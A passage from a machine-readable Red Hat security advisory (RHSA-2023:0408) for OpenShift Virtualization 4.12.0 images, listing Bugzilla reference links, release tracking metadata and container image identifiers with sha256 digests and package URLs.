"2128107", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128107", }, { category: "external", summary: "2128872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128872", }, { category: "external", summary: "2128948", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128948", }, { category: "external", summary: "2128949", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128949", }, { category: "external", summary: "2128997", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2128997", }, { category: "external", summary: "2129013", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129013", }, { category: "external", summary: "2129234", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129234", }, { category: "external", summary: "2129301", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129301", }, { category: "external", summary: "2129870", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2129870", }, { category: "external", summary: "2130509", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130509", }, { category: "external", summary: "2130588", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130588", }, { category: "external", summary: "2130695", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130695", }, { category: "external", summary: "2130909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2130909", }, { category: "external", summary: "2131157", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131157", }, { category: "external", summary: "2131165", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131165", }, { category: "external", summary: "2131674", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2131674", }, { category: "external", summary: "2132031", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132031", }, { category: "external", summary: "2132682", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132682", }, { category: "external", summary: "2132721", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132721", }, { category: "external", summary: "2132744", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132744", }, { category: "external", summary: "2132746", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132746", }, { category: "external", summary: "2132783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132783", }, { category: "external", summary: "2132793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132793", }, { category: "external", summary: "2132932", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2132932", }, { category: "external", summary: "2133540", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133540", }, { category: "external", summary: "2133541", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133541", }, { category: "external", summary: "2133542", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133542", }, { category: "external", summary: "2133543", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133543", }, { category: "external", summary: "2133655", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133655", }, { category: "external", summary: "2133656", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133656", }, { category: "external", summary: "2133659", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133659", }, { category: "external", summary: "2133660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2133660", }, { category: "external", summary: "2134123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134123", }, { category: "external", summary: "2134672", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134672", }, { category: "external", summary: "2134825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2134825", }, { category: "external", summary: "2135805", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2135805", }, { category: "external", summary: "2136051", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136051", }, { category: "external", summary: "2136425", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136425", }, { category: "external", summary: "2136534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2136534", }, { category: "external", summary: "2137123", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137123", }, { category: "external", summary: "2137241", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137241", }, { category: "external", summary: "2137243", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137243", }, { category: "external", summary: "2137349", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137349", }, { category: "external", summary: "2137591", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137591", }, { category: "external", summary: "2137731", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137731", }, { category: "external", summary: "2137733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137733", }, { category: "external", summary: "2137736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137736", }, { category: "external", summary: "2137896", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2137896", }, { category: "external", summary: "2138112", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138112", }, { category: "external", summary: "2138119", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138119", }, { category: "external", summary: "2138199", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138199", }, { category: "external", summary: "2138653", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138653", }, { category: "external", summary: "2138657", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138657", }, { category: "external", summary: "2138664", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2138664", }, { category: "external", summary: "2139257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139257", }, { category: "external", summary: "2139260", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139260", }, { category: "external", summary: "2139293", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139293", }, { category: "external", summary: "2139296", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139296", }, { category: "external", summary: "2139299", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139299", }, { category: "external", summary: "2139306", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139306", }, { category: "external", summary: "2139479", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139479", }, { category: "external", summary: "2139574", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139574", }, { category: "external", summary: "2139651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139651", }, { category: "external", summary: "2139687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139687", }, { category: "external", summary: "2139738", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139738", }, { category: "external", summary: "2139820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2139820", }, { category: "external", summary: "2140117", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140117", }, { category: "external", summary: "2140521", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140521", }, { category: "external", summary: "2140534", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140534", }, { category: "external", summary: "2140627", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140627", }, { category: "external", summary: "2140730", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140730", }, { category: "external", summary: "2140808", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140808", }, { category: "external", summary: "2140977", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140977", }, { category: "external", summary: "2140982", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140982", }, { category: "external", summary: "2140998", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2140998", }, { category: "external", summary: "2141089", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141089", }, { category: "external", summary: "2141302", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141302", }, { category: "external", summary: "2141399", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141399", }, { category: "external", summary: "2141494", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141494", }, { category: "external", summary: "2141654", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141654", }, { category: "external", summary: "2141711", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2141711", }, { category: "external", summary: "2142468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142468", }, { category: "external", summary: "2142470", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142470", }, { category: "external", summary: "2142511", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142511", }, { category: "external", summary: "2142647", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142647", }, { category: "external", summary: "2142891", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142891", }, { category: "external", summary: "2142929", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2142929", }, { category: "external", summary: "2143268", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143268", }, { category: "external", summary: "2143498", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143498", }, { category: "external", summary: "2143964", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2143964", }, { category: "external", summary: "2144580", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144580", }, { category: "external", summary: "2144828", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144828", }, { category: "external", summary: "2144839", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2144839", }, { category: "external", summary: "2153849", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2153849", }, { category: "external", summary: "2155757", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2155757", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_0408.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update", tracking: { current_release_date: "2025-01-06T19:22:54+00:00", generator: { date: "2025-01-06T19:22:54+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.5", }, }, id: "RHSA-2023:0408", initial_release_date: "2023-01-25T11:11:29+00:00", revision_history: [ { date: "2023-01-25T11:11:29+00:00", number: "1", summary: "Initial version", }, { date: "2023-01-25T11:11:29+00:00", number: "2", summary: "Last updated version", }, { date: "2025-01-06T19:22:54+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.12 for RHEL 8", product: { name: "CNV 4.12 for RHEL 8", product_id: "8Base-CNV-4.12", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.12::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.12.0-58", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.12.0-769", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product: { name: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_id: "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.12.0-30", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.12.0-31", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.12.0-96", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.12.0-24", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product: { name: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_id: "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin&tag=v4.12.0-182", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.12.0-64", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator&tag=v4.12.0-40", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product: { name: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_id: "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status&tag=v4.12.0-55", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.12.0-32", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.12.0-255", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.12.0-24", }, }, }, { category: 